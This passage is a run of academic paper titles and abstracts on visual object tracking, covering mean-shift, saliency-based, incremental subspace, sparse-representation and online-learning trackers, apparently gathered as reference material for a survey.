visual tracking based on discriminant center surround saliency. At each frame, discrimination of the target from the background is posed as a binary classification problem. From a pool of feature descriptors for the target and background, a subset that is most informative for classification between the two is selected using the principle of maximum marginal diversity. Using these features, the location of the target in the next frame is identified using top-down saliency, completing one iteration of the tracking algorithm. We also show that a simple extension of the framework to include motion features in a bottom-up saliency mode can robustly identify salient moving objects and automatically initialize the tracker. The connections of the proposed method to existing works on discriminant tracking are discussed. Experimental results comparing the proposed method to the state of the art in tracking are presented, showing improved performance. --- paper_title: Robust real-time object detection paper_content: This paper describes a visual object detection framework that is capable of processing images extremely rapidly while achieving high detection rates. There are three key contributions. 
The first is the introduction of a new image representation called the “Integral Image” which allows the features used by our detector to be computed very quickly. The second is a learning algorithm, based on AdaBoost, which selects a small number of critical visual features and yields extremely efficient classifiers [4]. The third contribution is a method for combining classifiers in a “cascade” which allows background regions of the image to be quickly discarded while spending more computation on promising object-like regions. A set of experiments in the domain of face detection are presented. The system yields face detection performance comparable to the best previous systems [16, 11, 14, 10, 1]. Implemented on a conventional desktop, face detection proceeds at 15 frames per second. --- paper_title: Online selection of discriminative tracking features paper_content: This paper presents an online feature selection mechanism for evaluating multiple features while tracking and adjusting the set of features used to improve tracking performance. Our hypothesis is that the features that best discriminate between object and background are also best for tracking the object. Given a set of seed features, we compute log likelihood ratios of class conditional sample densities from object and background to form a new set of candidate features tailored to the local object/background discrimination task. The two-class variance ratio is used to rank these new features according to how well they separate sample distributions of object and background pixels. This feature evaluation mechanism is embedded in a mean-shift tracking system that adaptively selects the top-ranked discriminative features for tracking. Examples are presented that demonstrate how this method adapts to changing appearances of both tracked object and scene background. We note susceptibility of the variance ratio feature selection method to distraction by spatially correlated background clutter and develop an additional approach that seeks to minimize the likelihood of distraction. --- paper_title: Spatial selection for attentional visual tracking paper_content: Long-duration tracking of general targets is quite challenging for computer vision, because in practice target may undergo large uncertainties in its visual appearance and the unconstrained environments may be cluttered and distractive, although tracking has never been a challenge to the human visual system.
Psychological and cognitive findings indicate that the human perception is attentional and selective, and both early attentional selection that may be innate and late attentional selection that may be learned are necessary for human visual tracking. This paper proposes a new visual tracking approach by reflecting some aspects of spatial selective attention, and presents a novel attentional visual tracking (AVT) algorithm. In AVT, the early selection process extracts a pool of attentional regions (ARs) that are defined as the salient image regions which have good localization properties, and the late selection process dynamically identifies a subset of discriminative attentional regions (D-ARs) through a discriminative learning on the historical data on the fly. The computationally demanding process of matching of the AR pool is done in an efficient and innovative way by using the idea in the locality-sensitive hashing (LSH) technique. The proposed AVT algorithm is general, robust and computationally efficient, as shown in extensive experiments on a large variety of real-world video. --- paper_title: Superpixel tracking paper_content: While numerous algorithms have been proposed for object tracking with demonstrated success, it remains a challenging problem for a tracker to handle large change in scale, motion, shape deformation with occlusion. One of the main reasons is the lack of effective image representation to account for appearance variation. Most trackers use high-level appearance structure or low-level cues for representing and matching target objects. In this paper, we propose a tracking method from the perspective of mid-level vision with structural information captured in superpixels. We present a discriminative appearance model based on superpixels, thereby facilitating a tracker to distinguish the target and the background with mid-level cues. The tracking task is then formulated by computing a target-background confidence map, and obtaining the best candidate by maximum a posterior estimate. Experimental results demonstrate that our tracker is able to handle heavy occlusion and recover from drifts. In conjunction with online update, the proposed algorithm is shown to perform favorably against existing methods for object tracking. --- paper_title: Hierarchical Part-Template Matching for Human Detection and Segmentation paper_content: Local part-based human detectors are capable of handling partial occlusions efficiently and modeling shape articulations flexibly, while global shape template-based human detectors are capable of detecting and segmenting human shapes simultaneously. We describe a Bayesian approach to human detection and segmentation combining local part-based and global template-based schemes. The approach relies on the key ideas of matching a part-template tree to images hierarchically to generate a reliable set of detection hypotheses and optimizing it under a Bayesian MAP framework through global likelihood re-evaluation and fine occlusion analysis. In addition to detection, our approach is able to obtain human shapes and poses simultaneously. We applied the approach to human detection and segmentation in crowded scenes with and without background subtraction. Experimental results show that our approach achieves good performance on images and video sequences with severe occlusion. 
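As an aside on the "Online selection of discriminative tracking features" abstract above: the log likelihood ratio features and the two-class variance ratio it describes are compact enough to sketch directly. The following Python/NumPy snippet is only an illustrative sketch under our own assumptions; the function names, the epsilon floor and the normalisation constants are ours, not the authors' implementation.

import numpy as np

def log_likelihood_ratio(obj_hist, bg_hist, eps=1e-3):
    # Per-bin log likelihood ratio of the (normalised) object histogram
    # against the (normalised) background histogram.
    p = obj_hist / max(obj_hist.sum(), 1e-12)
    q = bg_hist / max(bg_hist.sum(), 1e-12)
    return np.log(np.maximum(p, eps) / np.maximum(q, eps))

def variance_ratio(obj_hist, bg_hist):
    # Two-class variance ratio of the log likelihood ratio feature:
    # large when object and background are pushed far apart while each
    # class stays tightly clustered, so it can be used to rank features.
    p = obj_hist / max(obj_hist.sum(), 1e-12)
    q = bg_hist / max(bg_hist.sum(), 1e-12)
    L = log_likelihood_ratio(obj_hist, bg_hist)

    def var_under(weights):
        return np.sum(weights * L ** 2) - np.sum(weights * L) ** 2

    return var_under(0.5 * (p + q)) / (var_under(p) + var_under(q) + 1e-12)

# Example: rank a set of candidate colour features and keep the best ones.
# scores = [variance_ratio(p_i, q_i) for (p_i, q_i) in candidate_histograms]

In a tracker of the kind described in that abstract, the top-ranked features would then be handed to the localisation stage (e.g. mean shift) for the next frame.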
--- paper_title: Online tracking and reacquisition using co-trained generative and discriminative trackers paper_content: Visual tracking is a challenging problem, as an object may change its appearance due to viewpoint variations, illumination changes, and occlusion. Also, an object may leave the field of view and then reappear. In order to track and reacquire an unknown object with limited labeling data, we propose to learn these changes online and build a model that describes all seen appearance while tracking. To address this semi-supervised learning problem, we propose a co-training based approach to continuously label incoming data and online update a hybrid discriminative generative model. The generative model uses a number of low dimension linear subspaces to describe the appearance of the object. In order to reacquire an object, the generative model encodes all the appearance variations that have been seen. A discriminative classifier is implemented as an online support vector machine, which is trained to focus on recent appearance variations. The online co-training of this hybrid approach accounts for appearance changes and allows reacquisition of an object after total occlusion. We demonstrate that under challenging situations, this method has strong reacquisition ability and robustness to distracters in background. --- paper_title: Real time object tracking based on dynamic feature grouping with background subtraction paper_content: Object detection and tracking has various application areas including intelligent transportation systems. We introduce an object detection and tracking approach that combines the background subtraction algorithm and the feature tracking and grouping algorithm. We first present an augmented background subtraction algorithm which uses a low-level feature tracking as a cue. The resulting background subtraction cues are used to improve the feature detection and grouping result. We then present a dynamic multi-level feature grouping approach that can be used in real time applications and also provides high-quality trajectories. Experimental results from video clips of a challenging transportation application are presented. --- paper_title: Visual tracking with online Multiple Instance Learning paper_content: In this paper, we address the problem of learning an adaptive appearance model for object tracking. In particular, a class of tracking techniques called “tracking by detection” have been shown to give promising results at real-time speeds. These methods train a discriminative classifier in an online manner to separate the object from the background. This classifier bootstraps itself by using the current tracker state to extract positive and negative examples from the current frame. Slight inaccuracies in the tracker can therefore lead to incorrectly labeled training examples, which degrades the classifier and can cause further drift. In this paper we show that using Multiple Instance Learning (MIL) instead of traditional supervised learning avoids these problems, and can therefore lead to a more robust tracker with fewer parameter tweaks. We present a novel online MIL algorithm for object tracking that achieves superior results with real-time performance. --- paper_title: Tracking colour objects using adaptive mixture models paper_content: The use of adaptive Gaussian mixtures to model the colour distributions of objects is described. 
These models are used to perform robust, real-time tracking under varying illumination, viewing geometry and camera parameters. Observed log-likelihood measurements were used to perform selective adaptation. --- paper_title: Robust online appearance models for visual tracking paper_content: We propose a framework for learning robust, adaptive appearance models to be used for motion-based tracking of natural objects. The approach involves a mixture of stable image structure, learned over long time courses, along with 2-frame motion information and an outlier process. An online EM-algorithm is used to adapt the appearance model parameters over time. An implementation of this approach is developed for an appearance model based on the filter responses from a steerable pyramid. This model is used in a motion-based tracking algorithm to provide robustness in the face of image outliers, such as those caused by occlusions. It also provides the ability to adapt to natural changes in appearance, such as those due to facial expressions or variations in 3D pose. We show experimental results on a variety of natural image sequences of people moving within cluttered environments. --- paper_title: Differential Tracking based on Spatial-Appearance Model (SAM) paper_content: A fundamental issue in differential motion analysis is the compromise between the flexibility of the matching criterion for image regions and the ability of recovering the motion. Localized matching criteria, e.g., pixel-based SSD, may enable the recovery of all motion parameters, but it does not tolerate much appearance changes. On the other hand, global criteria, e.g., matching histograms, can accommodate dramatic appearance changes, but may be blind to some motion parameters, e.g., scaling and rotation. This paper presents a novel differential approach that integrates the advantages of both in a principled way based on a spatial-appearance model (SAM) that combines local appearances variations and global spatial structures. This model can capture a large variety of appearance variations that are attributed to the local non-rigidity. At the same time, this model enables efficient recovery of all motion parameters. A maximum likelihood matching criterion is defined and rigorous analytical results are obtained that lead to a closed form solution to motion tracking. Very encouraging results demonstrate the effectiveness and efficiency of the proposed method for tracking non-rigid objects that exhibit dramatic appearance deformations, large object scale changes and partial occlusions. --- paper_title: Visual tracking and recognition using appearance-adaptive models in particle filters paper_content: We present an approach that incorporates appearance-adaptive models in a particle filter to realize robust visual tracking and recognition algorithms. Tracking needs modeling interframe motion and appearance changes, whereas recognition needs modeling appearance changes between frames and gallery images. In conventional tracking algorithms, the appearance model is either fixed or rapidly changing, and the motion model is simply a random walk with fixed noise variance. Also, the number of particles is typically fixed. All these factors make the visual tracker unstable. To stabilize the tracker, we propose the following modifications: an observation model arising from an adaptive appearance model, an adaptive velocity motion model with adaptive noise variance, and an adaptive number of particles. 
The adaptive-velocity model is derived using a first-order linear predictor based on the appearance difference between the incoming observation and the previous particle configuration. Occlusion analysis is implemented using robust statistics. Experimental results on tracking visual objects in long outdoor and indoor video sequences demonstrate the effectiveness and robustness of our tracking algorithm. We then perform simultaneous tracking and recognition by embedding them in a particle filter. For recognition purposes, we model the appearance changes between frames and gallery images by constructing the intra- and extrapersonal spaces. Accurate recognition is achieved when confronted by pose and view variations. --- paper_title: On-line density-based appearance modeling for object tracking paper_content: Object tracking is a challenging problem in real-time computer vision due to variations of lighting condition, pose, scale, and view-point over time. However, it is exceptionally difficult to model appearance with respect to all of those variations in advance; instead, on-line update algorithms are employed to adapt to these changes. We present a new on-line appearance modeling technique which is based on sequential density approximation. This technique provides accurate and compact representations using Gaussian mixtures, in which the number of Gaussians is automatically determined. This procedure is performed in linear time at each time step, which we prove by amortized analysis. Features for each pixel and rectangular region are modeled together by the proposed sequential density approximation algorithm, and the target model is updated in scale robustly. We show the performance of our method by simulations and tracking in natural videos --- paper_title: Kernel-based Tracking from a Probabilistic Viewpoint paper_content: In this paper, we present a probabilistic formulation of kernel-based tracking methods based upon maximum likelihood estimation. To this end, we view the coordinates for the pixels in both, the target model and its candidate as random variables and make use of a generative model so as to cast the tracking task into a maximum likelihood framework. This, in turn, permits the use of the EM-algorithm to estimate a set of latent variables that can be used to update the target-center position. Once the latent variables have been estimated, we use the Kullback-Leibler divergence so as to minimise the mutual information between the target model and candidate distributions in order to develop a target-center update rule and a kernel bandwidth adjustment scheme. The method is very general in nature. We illustrate the utility of our approach for purposes of tracking on real-world video sequences using two alternative kernel functions. --- paper_title: Kernel-Based Object Tracking paper_content: A new approach toward target representation and localization, the central component in visual tracking of nonrigid objects, is proposed. The feature histogram-based target representations are regularized by spatial masking with an isotropic kernel. The masking induces spatially-smooth similarity functions suitable for gradient-based optimization, hence, the target localization problem can be formulated using the basin of attraction of the local maxima. We employ a metric derived from the Bhattacharyya coefficient as similarity measure, and use the mean shift procedure to perform the optimization. 
In the presented tracking examples, the new method successfully coped with camera motion, partial occlusions, clutter, and target scale variations. Integration with motion filters and data association techniques is also discussed. We describe only a few of the potential applications: exploitation of background information, Kalman tracking using motion models, and face tracking. --- paper_title: Sequential Kernel Density Approximation and Its Application to Real-Time Visual Tracking paper_content: Visual features are commonly modeled with probability density functions in computer vision problems, but current methods such as a mixture of Gaussians and kernel density estimation suffer from either the lack of flexibility by fixing or limiting the number of Gaussian components in the mixture or large memory requirement by maintaining a nonparametric representation of the density. These problems are aggravated in real-time computer vision applications since density functions are required to be updated as new data becomes available. We present a novel kernel density approximation technique based on the mean-shift mode finding algorithm and describe an efficient method to sequentially propagate the density modes over time. Although the proposed density representation is memory efficient, which is typical for mixture densities, it inherits the flexibility of nonparametric methods by allowing the number of components to be variable. The accuracy and compactness of the sequential kernel density approximation technique is illustrated by both simulations and experiments. Sequential kernel density approximation is applied to online target appearance modeling for visual tracking, and its performance is demonstrated on a variety of videos. --- paper_title: Tracking by Affine Kernel Transformations Using Color and Boundary Cues paper_content: Kernel-based trackers aggregate image features within the support of a kernel (a mask) regardless of their spatial structure. These trackers spatially fit the kernel (usually in location and in scale) such that a function of the aggregate is optimized. We propose a kernel-based visual tracker that exploits the constancy of color and the presence of color edges along the target boundary. The tracker estimates the best affinity of a spatially aligned pair of kernels, one of which is color-related and the other of which is object boundary-related. In a sense, this work extends previous kernel-based trackers by incorporating the object boundary cue into the tracking process and by allowing the kernels to be affinely transformed instead of only translated and isotropically scaled. These two extensions make for more precise target localization. A more accurately localized target also facilitates safer updating of its reference color model, further enhancing the tracker's robustness. The improved tracking is demonstrated for several challenging image sequences. --- paper_title: Annealed importance sampling paper_content: Simulated annealing - moving from a tractable distribution to a distribution of interest via a sequence of intermediate distributions - has traditionally been used as an inexact method of handling isolated modes in Markov chain samplers. Here, it is shown how one can use the Markov chain transitions for such an annealing sequence to define an importance sampler. 
The Markov chain aspect allows this method to perform acceptably even for high-dimensional problems, where finding good importance sampling distributions would otherwise be very difficult, while the use of importance weights ensures that the estimates found converge to the correct values as the number of annealing runs increases. This annealed importance sampling procedure resembles the second half of the previously-studied tempered transitions, and can be seen as a generalization of a recently-proposed variant of sequential importance sampling. It is also related to thermodynamic integration methods for estimating ratios of normalizing constants. Annealed importance sampling is most attractive when isolated modes are present, or when estimates of normalizing constants are required, but it may also be more generally useful, since its independent sampling allows one to bypass some of the problems of assessing convergence and autocorrelation in Markov chain samplers. --- paper_title: Fast Global Kernel Density Mode Seeking: Applications to Localization and Tracking paper_content: Tracking objects in video using the mean shift (MS) technique has been the subject of considerable attention. In this work, we aim to remedy one of its shortcomings. MS, like other gradient ascent optimization methods, is designed to find local modes. In many situations, however, we seek the global mode of a density function. The standard MS tracker assumes that the initialization point falls within the basin of attraction of the desired mode. When tracking objects in video this assumption may not hold, particularly when the target's displacement between successive frames is large. In this case, the local and global modes do not correspond and the tracker is likely to fail. A novel multibandwidth MS procedure is proposed which converges to the global mode of the density function, regardless of the initialization point. We term the procedure annealed MS, as it shares similarities with the annealed importance sampling procedure. The bandwidth of the procedure plays the same role as the temperature in conventional annealing. We observe that an over-smoothed density function with a sufficiently large bandwidth is unimodal. Using a continuation principle, the influence of the global peak in the density function is introduced gradually. In this way, the global maximum is more reliably located. Since it is imperative that the computational complexity is minimal for real-time applications, such as visual tracking, we also propose an accelerated version of the algorithm. This significantly decreases the number of iterations required to achieve convergence. We show on various data sets that the proposed algorithm offers considerable promise in reliably and rapidly finding the true object location when initialized from a distant point. --- paper_title: Mean-shift blob tracking through scale space paper_content: The mean-shift algorithm is an efficient technique for tracking 2D blobs through an image. Although the scale of the mean-shift kernel is a crucial parameter, there is presently no clean mechanism for choosing or updating scale while tracking blobs that are changing in size. We adapt Lindeberg's (1998) theory of feature scale selection based on local maxima of differential scale-space filters to the problem of selecting kernel scale for mean-shift blob tracking. We show that a difference of Gaussian (DOG) mean-shift kernel enables efficient tracking of blobs through scale space. 
Using this kernel requires generalizing the mean-shift algorithm to handle images that contain negative sample weights. --- paper_title: Mean Shift tracking with multiple reference color histograms paper_content: The Mean Shift tracker is a widely used tool for robustly and quickly tracking the location of an object in an image sequence using the object's color histogram. The reference histogram is typically set to that in the target region in the frame where the tracking is initiated. Often, however, no single view suffices to produce a reference histogram appropriate for tracking the target. In contexts where multiple views of the target are available prior to the tracking, this paper enhances the Mean Shift tracker to use multiple reference histograms obtained from these different target views. This is done while preserving both the convergence and the speed properties of the original tracker. We first suggest a simple method to use multiple reference histograms for producing a single histogram that is more appropriate for tracking the target. Then, to enhance the tracking further, we propose an extension to the Mean Shift tracker where the convex hull of these histograms is used as the target model. Many experimental results demonstrate the successful tracking of targets whose visible colors change drastically and rapidly during the sequence, where the basic Mean Shift tracker obviously fails. --- paper_title: Object Tracking by Asymmetric Kernel Mean Shift with Automatic Scale and Orientation Selection paper_content: Tracking objects using the mean shift method is performed by iteratively translating a kernel in the image space such that the past and current object observations are similar. Traditional mean shift method requires a symmetric kernel, such as a circle or an ellipse, and assumes constancy of the object scale and orientation during the course of tracking. In a tracking scenario, it is not uncommon to observe objects with complex shapes whose scale and orientation constantly change due to the camera and object motions. In this paper, we present an object tracking method based on the asymmetric kernel mean shift, in which the scale and orientation of the kernel adaptively change depending on the observations at each iteration. Proposed method extends the traditional mean shift tracking, which is performed in the image coordinates, by including the scale and orientation as additional dimensions and simultaneously estimates all the unknowns in a few number of mean shift iterations. The experimental results show that the proposed method is superior to the traditional mean shift tracking in the following aspects: 1) it provides consistent object tracking throughout the video; 2) it is not effected by the scale and orientation changes of the tracked objects; 3) it is less prone to the background clutter. --- paper_title: Online multiple instance learning with no regret paper_content: Multiple instance (MI) learning is a recent learning paradigm that is more flexible than standard supervised learning algorithms in the handling of label ambiguity. It has been used in a wide range of applications including image classification, object detection and object tracking. Typically, MI algorithms are trained in a batch setting in which the whole training set has to be available before training starts. However, in applications such as tracking, the classifier needs to be trained continuously as new frames arrive. 
Motivated by the empirical success of a batch MI algorithm called MILES, we propose in this paper an online MI learning algorithm that has an efficient online update procedure and also performs joint feature selection and classification as MILES. Besides, while existing online MI algorithms lack theoretical properties, we prove that the proposed online algorithm has a (cumulative) regret of O(√T), where T is the number of iterations. In other words, the average regret goes to zero asymptotically and it thus achieves the same performance as the best solution in hindsight. Experiments on a number of MI classification and object tracking data sets demonstrate encouraging results. --- paper_title: Online spatio-temporal structural context learning for visual tracking paper_content: Visual tracking is a challenging problem, because the target frequently change its appearance, randomly move its location and get occluded by other objects in unconstrained environments. The state changes of the target are temporally and spatially continuous, in this paper therefore, a robust Spatio-Temporal structural context based Tracker (STT) is presented to complete the tracking task in unconstrained environments. The temporal context capture the historical appearance information of the target to prevent the tracker from drifting to the background in a long term tracking. The spatial context model integrates contributors, which are the key-points automatically discovered around the target, to build a supporting field. The supporting field provides much more information than appearance of the target itself so that the location of the target will be predicted more precisely. Extensive experiments on various challenging databases demonstrate the superiority of our proposed tracker over other state-of-the-art trackers. --- paper_title: Object Tracking via Partial Least Squares Analysis paper_content: We propose an object tracking algorithm that learns a set of appearance models for adaptive discriminative object representation. In this paper, object tracking is posed as a binary classification problem in which the correlation of object appearance and class labels from foreground and background is modeled by partial least squares (PLS) analysis, for generating a low-dimensional discriminative feature subspace. As object appearance is temporally correlated and likely to repeat over time, we learn and adapt multiple appearance models with PLS analysis for robust tracking. The proposed algorithm exploits both the ground truth appearance information of the target labeled in the first frame and the image observations obtained online, thereby alleviating the tracking drift problem caused by model update. Experiments on numerous challenging sequences and comparisons to state-of-the-art methods demonstrate favorable performance of the proposed tracking algorithm. --- paper_title: Robust Visual Tracking Based on Incremental Tensor Subspace Learning paper_content: Most existing subspace analysis-based tracking algorithms utilize a flattened vector to represent a target, resulting in a high dimensional data learning problem. Recently, subspace analysis is incorporated into the multilinear framework which offline constructs a representation of image ensembles using high-order tensors. This reduces spatio-temporal redundancies substantially, whereas the computational and memory cost is high. 
In this paper, we present an effective online tensor subspace learning algorithm which models the appearance changes of a target by incrementally learning a low-order tensor eigenspace representation through adaptively updating the sample mean and eigenbasis. Tracking then is led by the state inference within the framework in which a particle filter is used for propagating sample distributions over the time. A novel likelihood function, based on the tensor reconstruction error norm, is developed to measure the similarity between the test image and the learned tensor subspace model during the tracking. Theoretic analysis and experimental evaluations against a state-of-the-art method demonstrate the promise and effectiveness of this algorithm. --- paper_title: Incremental Singular Value Decomposition of Uncertain Data with Missing Values paper_content: We introduce an incremental singular value decomposition (SVD) of incomplete data. The SVD is developed as data arrives, and can handle arbitrary missing/untrusted values, correlated uncertainty across rows or columns of the measurement matrix, and user priors. Since incomplete data does not uniquely specify an SVD, the procedure selects one having minimal rank. For a dense p × q matrix of low rank r, the incremental method has time complexity O(pqr) and space complexity O((p + q)r)--better than highly optimized batch algorithms such as MATLAB's svd(). In cases of missing data, it produces factorings of lower rank and residual than batch SVD algorithms applied to standard missing-data imputations. We show applications in computer vision and audio feature extraction. In computer vision, we use the incremental SVD to develop an efficient and unusually robust subspace-estimating flow-based tracker, and to handle occlusions/missing points in structure-from-motion factorizations. --- paper_title: Dynamic Appearance Modeling for Human Tracking paper_content: Dynamic appearance is one of the most important cues for tracking and identifying moving people. However, direct modeling spatio-temporal variations of such appearance is often a difficult problem due to their high dimensionality and nonlinearities. In this paper we present a human tracking system that uses a dynamic appearance and motion modeling framework based on the use of robust system dynamics identification and nonlinear dimensionality reduction techniques. The proposed system learns dynamic appearance and motion models from a small set of initial frames and does not require prior knowledge such as gender or type of activity. The advantages of the proposed tracking system are illustrated with several examples where the learned dynamics accurately predict the location and appearance of the targets in future frames, preventing tracking failures due to model drifting, target occlusion and scene clutter. --- paper_title: Incremental learning of weighted tensor subspace for visual tracking paper_content: Tensor analysis has been widely utilized in image-related machine learning applications, which has preferable performance over the vector-based approaches for its capability of holding the spatial structure information in some research field. The traditional tensor representation only includes the intensity values, which is sensitive to illumination variation. For this purpose, a weighted tensor subspace (WTS) is defined as object descriptor by combining the Retinex image with the original image. 
Then, an incremental learning algorithm is developed for WTS to adapt to the appearance change during the tracking. The proposed method could learn the lightness changing incrementally and get robust tracking performance under various luminance conditions. The experimental results illustrate the effectiveness of the proposed visual tracking Scheme. --- paper_title: Weighted and robust incremental method for subspace learning paper_content: Visual learning is expected to be a continuous and robust process, which treats input images and pixels selectively. In this paper, we present a method for subspace learning, which takes these considerations into account. We present an incremental method, which sequentially updates the principal subspace considering weighted influence of individual images as well as individual pixels within an image. This approach is further extended to enable determination of consistencies in the input data and imputation of the values in inconsistent pixels using the previously acquired knowledge, resulting in a novel incremental, weighted and robust method for subspace learning. --- paper_title: Visual tracking using learned linear subspaces paper_content: This paper presents a simple but robust visual tracking algorithm based on representing the appearances of objects using affine warps of learned linear subspaces of the image space. The tracker adaptively updates this subspace while tracking by finding a linear subspace that best approximates the observations made in the previous frames. Instead of the traditional L/sup 2/-reconstruction error norm which leads to subspace estimation using PCA or SVD, we argue that a variant of it, the uniform L/sup 2/-reconstruction error norm, is the right one for tracking. Under this framework we provide a simple and a computationally inexpensive algorithm for finding a subspace whose uniform L/sup 2/-reconstruction error norm for a given collection of data samples is below some threshold, and a simple tracking algorithm is an immediate consequence. We show experimental results on a variety of image sequences of people and man-made objects moving under challenging imaging conditions, which include drastic illumination variation, partial occlusion and extreme pose variation. --- paper_title: Sequential Karhunen-Loeve basis extraction and its application to images paper_content: The Karhunen-Loeve (KL) transform is an optimal method for approximating a set of vectors, which was used in image processing and computer vision for several tasks. Its computational demands and its batch calculation nature have limited its application. Here we present a new, sequential algorithm for calculating the KL basis, which is faster in typical applications and is especially advantageous for image sequences: the KL basis calculation is done with much lower delay and allows for dynamic updating of object databases for recognition. Systematic tests of the implemented algorithm show that these advantages are indeed obtained with the same accuracy available from batch KL algorithms. --- paper_title: Incremental Kernel Principal Component Analysis paper_content: The kernel principal component analysis (KPCA) has been applied in numerous image-related machine learning applications and it has exhibited superior performance over previous approaches, such as PCA. However, the standard implementation of KPCA scales badly with the problem size, making computations for large problems infeasible. 
Also, the "batch" nature of the standard KPCA computation method does not allow for applications that require online processing. This has somewhat restricted the domains in which KPCA can potentially be applied. This paper introduces an incremental computation algorithm for KPCA to address these two problems. The basis of the proposed solution lies in computing incremental linear PCA in the kernel induced feature space, and constructing reduced-set expansions to maintain constant update speed and memory usage. We also provide experimental results which demonstrate the effectiveness of the approach --- paper_title: Incremental Learning for Robust Visual Tracking paper_content: Visual tracking, in essence, deals with non-stationary image streams that change over time. While most existing algorithms are able to track objects well in controlled environments, they usually fail in the presence of significant variation of the object's appearance or surrounding illumination. One reason for such failures is that many algorithms employ fixed appearance models of the target. Such models are trained using only appearance data available before tracking begins, which in practice limits the range of appearances that are modeled, and ignores the large volume of information (such as shape changes or specific lighting conditions) that becomes available during tracking. In this paper, we present a tracking method that incrementally learns a low-dimensional subspace representation, efficiently adapting online to changes in the appearance of the target. The model update, based on incremental algorithms for principal component analysis, includes two important features: a method for correctly updating the sample mean, and a forgetting factor to ensure less modeling power is expended fitting older observations. Both of these features contribute measurably to improving overall tracking performance. Numerous experiments demonstrate the effectiveness of the proposed tracking algorithm in indoor and outdoor environments where the target objects undergo large changes in pose, scale, and illumination. --- paper_title: EigenTracking: Robust Matching and Tracking of Articulated Objects Using a View-Based Representation paper_content: This paper describes an approach for tracking rigid and articulated objects using a view-based representation. The approach builds on and extends work on eigenspace representations, robust estimation techniques, and parameterized optical flow estimation. First, we note that the least-squares image reconstruction of standard eigenspace techniques has a number of problems and we reformulate the reconstruction problem as one of robust estimation. Second we define a “subspace constancy assumption” that allows us to exploit techniques for parameterized optical flow estimation to simultaneously solve for the view of an object and the affine transformation between the eigenspace and the image. To account for large affine transformations between the eigenspace and the image we define a multi-scale eigenspace representation and a coarse-to-fine matching strategy. Finally, we use these techniques to track objects over long image sequences in which the objects simultaneously undergo both affine image motions and changes of view. In particular we use this “EigenTracking” technique to track and recognize the gestures of a moving hand. 
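Several of the abstracts above ("Sequential Karhunen-Loeve basis extraction", "Incremental Learning for Robust Visual Tracking", and the incremental PCA variants) revolve around the same computational core: sequentially updating a low-rank eigenbasis and the sample mean as new appearance data arrives. The sketch below illustrates that kind of update in Python/NumPy; the function name, the rank cap, and the simplified handling of the forgetting factor are our own assumptions rather than any single paper's algorithm.

import numpy as np

def incremental_subspace_update(U, S, mean, n_seen, new_cols,
                                max_rank=16, forget=1.0):
    # One sequential update of a low-dimensional appearance eigenbasis.
    # U (d x k) and S (k,) hold the current basis and singular values,
    # mean (d,) the running sample mean, n_seen the effective number of
    # samples already absorbed, and new_cols (d x m) the new observations
    # (e.g. flattened image patches collected since the last update).
    m = new_cols.shape[1]
    new_mean = new_cols.mean(axis=1)
    total = n_seen + m

    # Running mean of all data seen so far.
    updated_mean = (n_seen * mean + m * new_mean) / total

    # Centre the new data and append one extra column that accounts for
    # the shift between the old and new means.
    B = np.hstack([
        new_cols - new_mean[:, None],
        np.sqrt(n_seen * m / total) * (new_mean - mean)[:, None],
    ])

    # Re-factorise the (small) concatenation of the old, optionally
    # down-weighted, basis and the new centred data; the forgetting
    # factor below is a simplification of the schemes cited above.
    K = np.hstack([forget * U * S, B])
    U_new, S_new, _ = np.linalg.svd(K, full_matrices=False)

    # Keep only the leading components.
    keep = min(max_rank, S_new.size)
    return U_new[:, :keep], S_new[:keep], updated_mean, total

A tracker in the spirit of these abstracts would flatten tracked image patches into the columns of new_cols, apply such an update every few frames, and score candidate windows by their reconstruction error in the maintained subspace.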
--- paper_title: On incremental and robust subspace learning paper_content: Principal Component Analysis (PCA) has been of great interest in computer vision and pattern recognition. In particular, incrementally learning a PCA model, which is computationally efficient for large-scale problems as well as adaptable to reflect the variable state of a dynamic system, is an attractive research topic with numerous applications such as adaptive background modelling and active object recognition. In addition, the conventional PCA, in the sense of least mean squared error minimisation, is susceptible to outlying measurements. To address these two important issues, we present a novel algorithm of incremental PCA, and then extend it to robust PCA. Compared with the previous studies on robust PCA, our algorithm is computationally more efficient. We demonstrate the performance of these algorithms with experimental results on dynamic background modelling and multi-view face modelling. --- paper_title: Visual tracking via adaptive structural local sparse appearance model paper_content: Sparse representation has been applied to visual tracking by finding the best candidate with minimal reconstruction error using target templates. However most sparse representation based trackers only consider the holistic representation and do not make full use of the sparse coefficients to discriminate between the target and the background, and hence may fail with more possibility when there is similar object or occlusion in the scene. In this paper we develop a simple yet robust tracking method based on the structural local sparse appearance model. This representation exploits both partial information and spatial information of the target based on a novel alignment-pooling method. The similarity obtained by pooling across the local patches helps not only locate the target more accurately but also handle occlusion. In addition, we employ a template update strategy which combines incremental subspace learning and sparse representation. This strategy adapts the template to the appearance change of the target with less possibility of drifting and reduces the influence of the occluded target template as well. Both qualitative and quantitative evaluations on challenging benchmark image sequences demonstrate that the proposed tracking algorithm performs favorably against several state-of-the-art methods. --- paper_title: Minimum error bounded efficient ℓ1 tracker with occlusion detection paper_content: Recently, sparse representation has been applied to visual tracking to find the target with the minimum reconstruction error from the target template subspace. Though effective, these L1 trackers require high computational costs due to numerous calculations for l 1 minimization. In addition, the inherent occlusion insensitivity of the l 1 minimization has not been fully utilized. In this paper, we propose an efficient L1 tracker with minimum error bound and occlusion detection which we call Bounded Particle Resampling (BPR)-L1 tracker. First, the minimum error bound is quickly calculated from a linear least squares equation, and serves as a guide for particle resampling in a particle filter framework. Without loss of precision during resampling, most insignificant samples are removed before solving the computationally expensive l 1 minimization function. The BPR technique enables us to speed up the L1 tracker without sacrificing accuracy. 
Second, we perform occlusion detection by investigating the trivial coefficients in the ℓ1 minimization. These coefficients, by design, contain rich information about image corruptions including occlusion. Detected occlusions enhance the template updates to effectively reduce the drifting problem. The proposed method shows good performance as compared with several state-of-the-art trackers on challenging benchmark sequences. --- paper_title: Visual tracking decomposition paper_content: We propose a novel tracking algorithm that can work robustly in a challenging scenario such that several kinds of appearance and motion changes of an object occur at the same time. Our algorithm is based on a visual tracking decomposition scheme for the efficient design of observation and motion models as well as trackers. In our scheme, the observation model is decomposed into multiple basic observation models that are constructed by sparse principal component analysis (SPCA) of a set of feature templates. Each basic observation model covers a specific appearance of the object. The motion model is also represented by the combination of multiple basic motion models, each of which covers a different type of motion. Then the multiple basic trackers are designed by associating the basic observation models and the basic motion models, so that each specific tracker takes charge of a certain change in the object. All basic trackers are then integrated into one compound tracker through an interactive Markov Chain Monte Carlo (IMCMC) framework in which the basic trackers communicate with one another interactively while run in parallel. By exchanging information with others, each tracker further improves its performance, which results in increasing the whole performance of tracking. Experimental results show that our method tracks the object accurately and reliably in 